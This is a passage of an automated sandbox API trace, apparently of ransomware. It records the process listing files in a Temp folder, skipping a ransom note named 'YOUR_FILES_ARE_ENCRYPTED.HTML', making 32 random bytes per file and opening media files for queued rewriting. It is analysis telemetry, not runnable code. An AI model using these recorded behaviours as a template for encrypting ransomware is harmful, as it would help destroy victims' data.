param_2="%02X" | out: param_1="86") returned 2 [0164.220] wsprintfW (in: param_1=0x4ebd72e, param_2="%02X" | out: param_1="35") returned 2 [0164.220] wsprintfW (in: param_1=0x4ebd732, param_2="%02X" | out: param_1="67") returned 2 [0164.220] wsprintfW (in: param_1=0x4ebd736, param_2="%02X" | out: param_1="5D") returned 2 [0164.220] wsprintfW (in: param_1=0x4ebd73a, param_2="%02X" | out: param_1="98") returned 2 [0164.221] wsprintfW (in: param_1=0x4ebd73e, param_2="%02X" | out: param_1="0E") returned 2 [0164.221] wsprintfW (in: param_1=0x4ebd742, param_2="%02X" | out: param_1="82") returned 2 [0164.221] wsprintfW (in: param_1=0x4ebd746, param_2="%02X" | out: param_1="58") returned 2 [0164.221] wsprintfW (in: param_1=0x4ebd74a, param_2="%02X" | out: param_1="0A") returned 2 [0164.221] wsprintfW (in: param_1=0x4ebd74e, param_2="%02X" | out: param_1="EA") returned 2 [0164.221] wsprintfW (in: param_1=0x4ebd752, param_2="%02X" | out: param_1="8D") returned 2 [0164.221] wsprintfW (in: param_1=0x4ebd756, param_2="%02X" | out: param_1="39") returned 2 [0164.221] wsprintfW (in: param_1=0x4ebd75a, param_2="%02X" | out: param_1="61") returned 2 [0164.221] wsprintfW (in: param_1=0x4ebd75e, param_2="%02X" | out: param_1="A5") returned 2 [0164.221] wsprintfW (in: param_1=0x4ebd762, param_2="%02X" | out: param_1="C6") returned 2 [0164.221] wsprintfW (in: param_1=0x4ebd766, param_2="%02X" | out: param_1="C0") returned 2 [0164.221] wsprintfW (in: param_1=0x4ebd76a, param_2="%02X" | out: param_1="D4") returned 2 [0164.221] wsprintfW (in: param_1=0x4ebd76e, param_2="%02X" | out: param_1="C1") returned 2 [0164.221] wsprintfW (in: param_1=0x4ebd772, param_2="%02X" | out: param_1="99") returned 2 [0164.221] wsprintfW (in: param_1=0x4ebd776, param_2="%02X" | out: param_1="0B") returned 2 [0164.221] wsprintfW (in: param_1=0x4ebd77a, param_2="%02X" | out: param_1="FE") returned 2 [0164.221] wsprintfW (in: param_1=0x4ebd77e, param_2="%02X" | out: param_1="68") returned 2 [0164.221] wsprintfW 
(in: param_1=0x4ebd782, param_2="%02X" | out: param_1="C6") returned 2 [0164.221] wsprintfW (in: param_1=0x4ebd786, param_2="%02X" | out: param_1="72") returned 2 [0164.221] wsprintfW (in: param_1=0x4ebd78a, param_2="%02X" | out: param_1="A1") returned 2 [0164.221] wsprintfW (in: param_1=0x4ebd78e, param_2="%02X" | out: param_1="12") returned 2 [0164.221] wsprintfW (in: param_1=0x4ebd792, param_2="%02X" | out: param_1="D9") returned 2 [0164.221] wsprintfW (in: param_1=0x4ebd796, param_2="%02X" | out: param_1="75") returned 2 [0164.221] wsprintfW (in: param_1=0x4ebd79a, param_2="%02X" | out: param_1="14") returned 2 [0164.221] wsprintfW (in: param_1=0x4ebd79e, param_2="%02X" | out: param_1="C0") returned 2 [0164.221] wsprintfW (in: param_1=0x4ebd7a2, param_2="%02X" | out: param_1="D5") returned 2 [0164.221] wsprintfW (in: param_1=0x4ebd7a6, param_2="%02X" | out: param_1="31") returned 2 [0164.222] lstrcpyW (in: lpString1=0x74823cc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\MNGTh.pps" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\MNGTh.pps") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\MNGTh.pps" [0164.222] CreateIoCompletionPort (FileHandle=0x5ac, ExistingCompletionPort=0x3a0, CompletionKey=0x7472318, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0164.222] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x7472318, lpOverlapped=0x7472318) returned 1 [0164.222] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xdc761e30, ftCreationTime.dwHighDateTime=0x1d7d82f, ftLastAccessTime.dwLowDateTime=0x24467090, ftLastAccessTime.dwHighDateTime=0x1d7d9f5, ftLastWriteTime.dwLowDateTime=0x24467090, ftLastWriteTime.dwHighDateTime=0x1d7d9f5, nFileSizeHigh=0x0, nFileSizeLow=0xb0c2, dwReserved0=0xffe64ae6, dwReserved1=0xffffffff, cFileName="Mqc9Q8Qugqo7NNB 4E9u.m4a", 
cAlternateFileName="MQC9Q8~1.M4A")) returned 1 [0164.222] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\Mqc9Q8Qugqo7NNB 4E9u.m4a") returned 67 [0164.222] lstrcmpW (lpString1="Mqc9Q8Qugqo7NNB 4E9u.m4a", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0164.222] PathFindExtensionW (pszPath="Mqc9Q8Qugqo7NNB 4E9u.m4a") returned=".m4a" [0164.222] lstrlenW (lpString=".m4a") returned 4 [0164.222] PathFindExtensionW (pszPath="Mqc9Q8Qugqo7NNB 4E9u.m4a") returned=".m4a" [0164.222] SystemFunction036 (in: RandomBuffer=0x4ebd7ec, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd7ec) returned 1 [0164.222] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\Mqc9Q8Qugqo7NNB 4E9u.m4a" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\temp\\mqc9q8qugqo7nnb 4e9u.m4a"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x58c [0164.223] GetFileSizeEx (in: hFile=0x58c, lpFileSize=0x4ebd810 | out: lpFileSize=0x4ebd810*=45250) returned 1 [0164.223] GetProcessHeap () returned 0x270000 [0164.223] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x750a170 [0164.226] wsprintfW (in: param_1=0x4ebd72a, param_2="%02X" | out: param_1="9C") returned 2 [0164.226] wsprintfW (in: param_1=0x4ebd72e, param_2="%02X" | out: param_1="3B") returned 2 [0164.227] wsprintfW (in: param_1=0x4ebd732, param_2="%02X" | out: param_1="E6") returned 2 [0164.227] wsprintfW (in: param_1=0x4ebd736, param_2="%02X" | out: param_1="4F") returned 2 [0164.227] wsprintfW (in: param_1=0x4ebd73a, param_2="%02X" | out: param_1="99") returned 2 [0164.227] wsprintfW (in: param_1=0x4ebd73e, param_2="%02X" | out: param_1="68") returned 2 [0164.227] wsprintfW (in: param_1=0x4ebd742, param_2="%02X" | out: param_1="79") returned 2 [0164.227] wsprintfW (in: param_1=0x4ebd746, 
param_2="%02X" | out: param_1="C4") returned 2 [0164.227] wsprintfW (in: param_1=0x4ebd74a, param_2="%02X" | out: param_1="B3") returned 2 [0164.227] wsprintfW (in: param_1=0x4ebd74e, param_2="%02X" | out: param_1="3D") returned 2 [0164.227] wsprintfW (in: param_1=0x4ebd752, param_2="%02X" | out: param_1="D0") returned 2 [0164.227] wsprintfW (in: param_1=0x4ebd756, param_2="%02X" | out: param_1="AE") returned 2 [0164.227] wsprintfW (in: param_1=0x4ebd75a, param_2="%02X" | out: param_1="F4") returned 2 [0164.227] wsprintfW (in: param_1=0x4ebd75e, param_2="%02X" | out: param_1="03") returned 2 [0164.227] wsprintfW (in: param_1=0x4ebd762, param_2="%02X" | out: param_1="CD") returned 2 [0164.227] wsprintfW (in: param_1=0x4ebd766, param_2="%02X" | out: param_1="9F") returned 2 [0164.227] wsprintfW (in: param_1=0x4ebd76a, param_2="%02X" | out: param_1="83") returned 2 [0164.227] wsprintfW (in: param_1=0x4ebd76e, param_2="%02X" | out: param_1="FA") returned 2 [0164.227] wsprintfW (in: param_1=0x4ebd772, param_2="%02X" | out: param_1="5A") returned 2 [0164.227] wsprintfW (in: param_1=0x4ebd776, param_2="%02X" | out: param_1="5D") returned 2 [0164.227] wsprintfW (in: param_1=0x4ebd77a, param_2="%02X" | out: param_1="9F") returned 2 [0164.227] wsprintfW (in: param_1=0x4ebd77e, param_2="%02X" | out: param_1="D7") returned 2 [0164.227] wsprintfW (in: param_1=0x4ebd782, param_2="%02X" | out: param_1="5F") returned 2 [0164.227] wsprintfW (in: param_1=0x4ebd786, param_2="%02X" | out: param_1="2D") returned 2 [0164.227] wsprintfW (in: param_1=0x4ebd78a, param_2="%02X" | out: param_1="32") returned 2 [0164.227] wsprintfW (in: param_1=0x4ebd78e, param_2="%02X" | out: param_1="86") returned 2 [0164.227] wsprintfW (in: param_1=0x4ebd792, param_2="%02X" | out: param_1="A4") returned 2 [0164.227] wsprintfW (in: param_1=0x4ebd796, param_2="%02X" | out: param_1="61") returned 2 [0164.227] wsprintfW (in: param_1=0x4ebd79a, param_2="%02X" | out: param_1="01") returned 2 [0164.227] wsprintfW 
(in: param_1=0x4ebd79e, param_2="%02X" | out: param_1="F5") returned 2 [0164.227] wsprintfW (in: param_1=0x4ebd7a2, param_2="%02X" | out: param_1="52") returned 2 [0164.228] wsprintfW (in: param_1=0x4ebd7a6, param_2="%02X" | out: param_1="4A") returned 2 [0164.228] lstrcpyW (in: lpString1=0x751a224, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\Mqc9Q8Qugqo7NNB 4E9u.m4a" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\Mqc9Q8Qugqo7NNB 4E9u.m4a") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\Mqc9Q8Qugqo7NNB 4E9u.m4a" [0164.228] CreateIoCompletionPort (FileHandle=0x58c, ExistingCompletionPort=0x3a0, CompletionKey=0x750a170, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0164.228] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x750a170, lpOverlapped=0x750a170) returned 1 [0164.228] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x39412a20, ftCreationTime.dwHighDateTime=0x1d7dc08, ftLastAccessTime.dwLowDateTime=0x4b5cf870, ftLastAccessTime.dwHighDateTime=0x1d7e1c5, ftLastWriteTime.dwLowDateTime=0x4b5cf870, ftLastWriteTime.dwHighDateTime=0x1d7e1c5, nFileSizeHigh=0x0, nFileSizeLow=0x8a8, dwReserved0=0xffe64ae6, dwReserved1=0xffffffff, cFileName="NsQYdkJrgZsh.bmp", cAlternateFileName="NSQYDK~1.BMP")) returned 1 [0164.228] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\NsQYdkJrgZsh.bmp") returned 59 [0164.228] lstrcmpW (lpString1="NsQYdkJrgZsh.bmp", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0164.228] PathFindExtensionW (pszPath="NsQYdkJrgZsh.bmp") returned=".bmp" [0164.228] lstrlenW (lpString=".bmp") returned 4 [0164.228] PathFindExtensionW (pszPath="NsQYdkJrgZsh.bmp") returned=".bmp" [0164.228] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: 
lpFindFileData=0x4ebd848*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x40aed350, ftCreationTime.dwHighDateTime=0x1d7de53, ftLastAccessTime.dwLowDateTime=0xbe30f180, ftLastAccessTime.dwHighDateTime=0x1d7e71f, ftLastWriteTime.dwLowDateTime=0xbe30f180, ftLastWriteTime.dwHighDateTime=0x1d7e71f, nFileSizeHigh=0x0, nFileSizeLow=0x13ac5, dwReserved0=0xffe64ae6, dwReserved1=0xffffffff, cFileName="O6G9QISY-h.mp3", cAlternateFileName="O6G9QI~1.MP3")) returned 1 [0164.228] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\O6G9QISY-h.mp3") returned 57 [0164.228] lstrcmpW (lpString1="O6G9QISY-h.mp3", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0164.229] PathFindExtensionW (pszPath="O6G9QISY-h.mp3") returned=".mp3" [0164.229] lstrlenW (lpString=".mp3") returned 4 [0164.229] PathFindExtensionW (pszPath="O6G9QISY-h.mp3") returned=".mp3" [0164.229] SystemFunction036 (in: RandomBuffer=0x4ebd7ec, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd7ec) returned 1 [0164.229] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\O6G9QISY-h.mp3" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\temp\\o6g9qisy-h.mp3"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5b8 [0164.230] GetFileSizeEx (in: hFile=0x5b8, lpFileSize=0x4ebd810 | out: lpFileSize=0x4ebd810*=80581) returned 1 [0164.230] GetProcessHeap () returned 0x270000 [0164.230] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x75322c8 [0164.234] wsprintfW (in: param_1=0x4ebd72a, param_2="%02X" | out: param_1="80") returned 2 [0164.234] wsprintfW (in: param_1=0x4ebd72e, param_2="%02X" | out: param_1="7A") returned 2 [0164.234] wsprintfW (in: param_1=0x4ebd732, param_2="%02X" | out: param_1="64") returned 2 [0164.234] wsprintfW (in: param_1=0x4ebd736, param_2="%02X" 
| out: param_1="FA") returned 2 [0164.234] wsprintfW (in: param_1=0x4ebd73a, param_2="%02X" | out: param_1="85") returned 2 [0164.234] wsprintfW (in: param_1=0x4ebd73e, param_2="%02X" | out: param_1="80") returned 2 [0164.234] wsprintfW (in: param_1=0x4ebd742, param_2="%02X" | out: param_1="AE") returned 2 [0164.234] wsprintfW (in: param_1=0x4ebd746, param_2="%02X" | out: param_1="80") returned 2 [0164.234] wsprintfW (in: param_1=0x4ebd74a, param_2="%02X" | out: param_1="E5") returned 2 [0164.234] wsprintfW (in: param_1=0x4ebd74e, param_2="%02X" | out: param_1="C1") returned 2 [0164.234] wsprintfW (in: param_1=0x4ebd752, param_2="%02X" | out: param_1="0B") returned 2 [0164.234] wsprintfW (in: param_1=0x4ebd756, param_2="%02X" | out: param_1="32") returned 2 [0164.234] wsprintfW (in: param_1=0x4ebd75a, param_2="%02X" | out: param_1="87") returned 2 [0164.234] wsprintfW (in: param_1=0x4ebd75e, param_2="%02X" | out: param_1="72") returned 2 [0164.234] wsprintfW (in: param_1=0x4ebd762, param_2="%02X" | out: param_1="7B") returned 2 [0164.234] wsprintfW (in: param_1=0x4ebd766, param_2="%02X" | out: param_1="8E") returned 2 [0164.234] wsprintfW (in: param_1=0x4ebd76a, param_2="%02X" | out: param_1="3F") returned 2 [0164.234] wsprintfW (in: param_1=0x4ebd76e, param_2="%02X" | out: param_1="62") returned 2 [0164.234] wsprintfW (in: param_1=0x4ebd772, param_2="%02X" | out: param_1="50") returned 2 [0164.234] wsprintfW (in: param_1=0x4ebd776, param_2="%02X" | out: param_1="73") returned 2 [0164.234] wsprintfW (in: param_1=0x4ebd77a, param_2="%02X" | out: param_1="74") returned 2 [0164.234] wsprintfW (in: param_1=0x4ebd77e, param_2="%02X" | out: param_1="DB") returned 2 [0164.234] wsprintfW (in: param_1=0x4ebd782, param_2="%02X" | out: param_1="47") returned 2 [0164.234] wsprintfW (in: param_1=0x4ebd786, param_2="%02X" | out: param_1="AC") returned 2 [0164.234] wsprintfW (in: param_1=0x4ebd78a, param_2="%02X" | out: param_1="9C") returned 2 [0164.234] wsprintfW (in: 
param_1=0x4ebd78e, param_2="%02X" | out: param_1="8F") returned 2 [0164.234] wsprintfW (in: param_1=0x4ebd792, param_2="%02X" | out: param_1="0D") returned 2 [0164.234] wsprintfW (in: param_1=0x4ebd796, param_2="%02X" | out: param_1="99") returned 2 [0164.234] wsprintfW (in: param_1=0x4ebd79a, param_2="%02X" | out: param_1="98") returned 2 [0164.235] wsprintfW (in: param_1=0x4ebd79e, param_2="%02X" | out: param_1="FF") returned 2 [0164.235] wsprintfW (in: param_1=0x4ebd7a2, param_2="%02X" | out: param_1="71") returned 2 [0164.235] wsprintfW (in: param_1=0x4ebd7a6, param_2="%02X" | out: param_1="6E") returned 2 [0164.235] lstrcpyW (in: lpString1=0x754237c, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\O6G9QISY-h.mp3" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\O6G9QISY-h.mp3") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\O6G9QISY-h.mp3" [0164.235] CreateIoCompletionPort (FileHandle=0x5b8, ExistingCompletionPort=0x3a0, CompletionKey=0x75322c8, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0164.235] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x75322c8, lpOverlapped=0x75322c8) returned 1 [0164.235] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x1ed76160, ftCreationTime.dwHighDateTime=0x1d7dd9b, ftLastAccessTime.dwLowDateTime=0x5877ab10, ftLastAccessTime.dwHighDateTime=0x1d7e416, ftLastWriteTime.dwLowDateTime=0x5877ab10, ftLastWriteTime.dwHighDateTime=0x1d7e416, nFileSizeHigh=0x0, nFileSizeLow=0x40cb, dwReserved0=0xffe64ae6, dwReserved1=0xffffffff, cFileName="P0ZYRY4.mp4", cAlternateFileName="")) returned 1 [0164.235] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\P0ZYRY4.mp4") returned 54 [0164.235] lstrcmpW (lpString1="P0ZYRY4.mp4", 
lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0164.235] PathFindExtensionW (pszPath="P0ZYRY4.mp4") returned=".mp4" [0164.235] lstrlenW (lpString=".mp4") returned 4 [0164.235] PathFindExtensionW (pszPath="P0ZYRY4.mp4") returned=".mp4" [0164.235] SystemFunction036 (in: RandomBuffer=0x4ebd7ec, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd7ec) returned 1 [0164.236] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\P0ZYRY4.mp4" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\temp\\p0zyry4.mp4"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5b4 [0164.236] GetFileSizeEx (in: hFile=0x5b4, lpFileSize=0x4ebd810 | out: lpFileSize=0x4ebd810*=16587) returned 1 [0164.236] GetProcessHeap () returned 0x270000 [0164.236] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x755a420 [0164.240] wsprintfW (in: param_1=0x4ebd72a, param_2="%02X" | out: param_1="05") returned 2 [0164.240] wsprintfW (in: param_1=0x4ebd72e, param_2="%02X" | out: param_1="11") returned 2 [0164.240] wsprintfW (in: param_1=0x4ebd732, param_2="%02X" | out: param_1="E6") returned 2 [0164.240] wsprintfW (in: param_1=0x4ebd736, param_2="%02X" | out: param_1="34") returned 2 [0164.240] wsprintfW (in: param_1=0x4ebd73a, param_2="%02X" | out: param_1="87") returned 2 [0164.240] wsprintfW (in: param_1=0x4ebd73e, param_2="%02X" | out: param_1="50") returned 2 [0164.240] wsprintfW (in: param_1=0x4ebd742, param_2="%02X" | out: param_1="B2") returned 2 [0164.240] wsprintfW (in: param_1=0x4ebd746, param_2="%02X" | out: param_1="4F") returned 2 [0164.240] wsprintfW (in: param_1=0x4ebd74a, param_2="%02X" | out: param_1="7A") returned 2 [0164.240] wsprintfW (in: param_1=0x4ebd74e, param_2="%02X" | out: param_1="D4") returned 2 [0164.240] wsprintfW (in: param_1=0x4ebd752, param_2="%02X" | out: param_1="C9") returned 2 [0164.240] wsprintfW (in: 
param_1=0x4ebd756, param_2="%02X" | out: param_1="FA") returned 2 [0164.240] wsprintfW (in: param_1=0x4ebd75a, param_2="%02X" | out: param_1="BA") returned 2 [0164.240] wsprintfW (in: param_1=0x4ebd75e, param_2="%02X" | out: param_1="C4") returned 2 [0164.240] wsprintfW (in: param_1=0x4ebd762, param_2="%02X" | out: param_1="FB") returned 2 [0164.240] wsprintfW (in: param_1=0x4ebd766, param_2="%02X" | out: param_1="75") returned 2 [0164.240] wsprintfW (in: param_1=0x4ebd76a, param_2="%02X" | out: param_1="D5") returned 2 [0164.240] wsprintfW (in: param_1=0x4ebd76e, param_2="%02X" | out: param_1="F2") returned 2 [0164.240] wsprintfW (in: param_1=0x4ebd772, param_2="%02X" | out: param_1="14") returned 2 [0164.240] wsprintfW (in: param_1=0x4ebd776, param_2="%02X" | out: param_1="5E") returned 2 [0164.240] wsprintfW (in: param_1=0x4ebd77a, param_2="%02X" | out: param_1="DB") returned 2 [0164.240] wsprintfW (in: param_1=0x4ebd77e, param_2="%02X" | out: param_1="84") returned 2 [0164.240] wsprintfW (in: param_1=0x4ebd782, param_2="%02X" | out: param_1="CB") returned 2 [0164.240] wsprintfW (in: param_1=0x4ebd786, param_2="%02X" | out: param_1="4D") returned 2 [0164.240] wsprintfW (in: param_1=0x4ebd78a, param_2="%02X" | out: param_1="8A") returned 2 [0164.240] wsprintfW (in: param_1=0x4ebd78e, param_2="%02X" | out: param_1="30") returned 2 [0164.241] wsprintfW (in: param_1=0x4ebd792, param_2="%02X" | out: param_1="AA") returned 2 [0164.241] wsprintfW (in: param_1=0x4ebd796, param_2="%02X" | out: param_1="E6") returned 2 [0164.241] wsprintfW (in: param_1=0x4ebd79a, param_2="%02X" | out: param_1="D5") returned 2 [0164.241] wsprintfW (in: param_1=0x4ebd79e, param_2="%02X" | out: param_1="CE") returned 2 [0164.241] wsprintfW (in: param_1=0x4ebd7a2, param_2="%02X" | out: param_1="0B") returned 2 [0164.241] wsprintfW (in: param_1=0x4ebd7a6, param_2="%02X" | out: param_1="6B") returned 2 [0164.241] lstrcpyW (in: lpString1=0x756a4d4, 
lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\P0ZYRY4.mp4" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\P0ZYRY4.mp4") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\P0ZYRY4.mp4" [0164.241] CreateIoCompletionPort (FileHandle=0x5b4, ExistingCompletionPort=0x3a0, CompletionKey=0x755a420, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0164.241] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x755a420, lpOverlapped=0x755a420) returned 1 [0164.241] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x1a10e310, ftCreationTime.dwHighDateTime=0x1d7e406, ftLastAccessTime.dwLowDateTime=0xae5879a0, ftLastAccessTime.dwHighDateTime=0x1d7e52a, ftLastWriteTime.dwLowDateTime=0xae5879a0, ftLastWriteTime.dwHighDateTime=0x1d7e52a, nFileSizeHigh=0x0, nFileSizeLow=0xe304, dwReserved0=0xffe64ae6, dwReserved1=0xffffffff, cFileName="pu5v.gif", cAlternateFileName="")) returned 1 [0164.241] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\pu5v.gif") returned 51 [0164.242] lstrcmpW (lpString1="pu5v.gif", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0164.242] PathFindExtensionW (pszPath="pu5v.gif") returned=".gif" [0164.242] lstrlenW (lpString=".gif") returned 4 [0164.242] PathFindExtensionW (pszPath="pu5v.gif") returned=".gif" [0164.242] SystemFunction036 (in: RandomBuffer=0x4ebd7ec, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd7ec) returned 1 [0164.242] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\pu5v.gif" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\temp\\pu5v.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5bc [0164.242] 
GetFileSizeEx (in: hFile=0x5bc, lpFileSize=0x4ebd810 | out: lpFileSize=0x4ebd810*=58116) returned 1 [0164.242] GetProcessHeap () returned 0x270000 [0164.242] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x7582578 [0164.246] wsprintfW (in: param_1=0x4ebd72a, param_2="%02X" | out: param_1="42") returned 2 [0164.246] wsprintfW (in: param_1=0x4ebd72e, param_2="%02X" | out: param_1="44") returned 2 [0164.246] wsprintfW (in: param_1=0x4ebd732, param_2="%02X" | out: param_1="0C") returned 2 [0164.246] wsprintfW (in: param_1=0x4ebd736, param_2="%02X" | out: param_1="BC") returned 2 [0164.246] wsprintfW (in: param_1=0x4ebd73a, param_2="%02X" | out: param_1="19") returned 2 [0164.246] wsprintfW (in: param_1=0x4ebd73e, param_2="%02X" | out: param_1="BE") returned 2 [0164.246] wsprintfW (in: param_1=0x4ebd742, param_2="%02X" | out: param_1="37") returned 2 [0164.246] wsprintfW (in: param_1=0x4ebd746, param_2="%02X" | out: param_1="32") returned 2 [0164.246] wsprintfW (in: param_1=0x4ebd74a, param_2="%02X" | out: param_1="62") returned 2 [0164.246] wsprintfW (in: param_1=0x4ebd74e, param_2="%02X" | out: param_1="06") returned 2 [0164.246] wsprintfW (in: param_1=0x4ebd752, param_2="%02X" | out: param_1="53") returned 2 [0164.246] wsprintfW (in: param_1=0x4ebd756, param_2="%02X" | out: param_1="1B") returned 2 [0164.246] wsprintfW (in: param_1=0x4ebd75a, param_2="%02X" | out: param_1="5C") returned 2 [0164.246] wsprintfW (in: param_1=0x4ebd75e, param_2="%02X" | out: param_1="7F") returned 2 [0164.246] wsprintfW (in: param_1=0x4ebd762, param_2="%02X" | out: param_1="1D") returned 2 [0164.246] wsprintfW (in: param_1=0x4ebd766, param_2="%02X" | out: param_1="97") returned 2 [0164.246] wsprintfW (in: param_1=0x4ebd76a, param_2="%02X" | out: param_1="D1") returned 2 [0164.246] wsprintfW (in: param_1=0x4ebd76e, param_2="%02X" | out: param_1="89") returned 2 [0164.246] wsprintfW (in: param_1=0x4ebd772, param_2="%02X" | out: param_1="4E") returned 2 [0164.246] 
wsprintfW (in: param_1=0x4ebd776, param_2="%02X" | out: param_1="7B") returned 2 [0164.246] wsprintfW (in: param_1=0x4ebd77a, param_2="%02X" | out: param_1="6A") returned 2 [0164.247] wsprintfW (in: param_1=0x4ebd77e, param_2="%02X" | out: param_1="9A") returned 2 [0164.247] wsprintfW (in: param_1=0x4ebd782, param_2="%02X" | out: param_1="C7") returned 2 [0164.247] wsprintfW (in: param_1=0x4ebd786, param_2="%02X" | out: param_1="C1") returned 2 [0164.247] wsprintfW (in: param_1=0x4ebd78a, param_2="%02X" | out: param_1="62") returned 2 [0164.247] wsprintfW (in: param_1=0x4ebd78e, param_2="%02X" | out: param_1="3B") returned 2 [0164.247] wsprintfW (in: param_1=0x4ebd792, param_2="%02X" | out: param_1="B0") returned 2 [0164.247] wsprintfW (in: param_1=0x4ebd796, param_2="%02X" | out: param_1="B9") returned 2 [0164.247] wsprintfW (in: param_1=0x4ebd79a, param_2="%02X" | out: param_1="41") returned 2 [0164.247] wsprintfW (in: param_1=0x4ebd79e, param_2="%02X" | out: param_1="82") returned 2 [0164.247] wsprintfW (in: param_1=0x4ebd7a2, param_2="%02X" | out: param_1="05") returned 2 [0164.247] wsprintfW (in: param_1=0x4ebd7a6, param_2="%02X" | out: param_1="09") returned 2 [0164.247] lstrcpyW (in: lpString1=0x759262c, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\pu5v.gif" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\pu5v.gif") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\pu5v.gif" [0164.247] CreateIoCompletionPort (FileHandle=0x5bc, ExistingCompletionPort=0x3a0, CompletionKey=0x7582578, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0164.247] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x7582578, lpOverlapped=0x7582578) returned 1 [0164.247] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 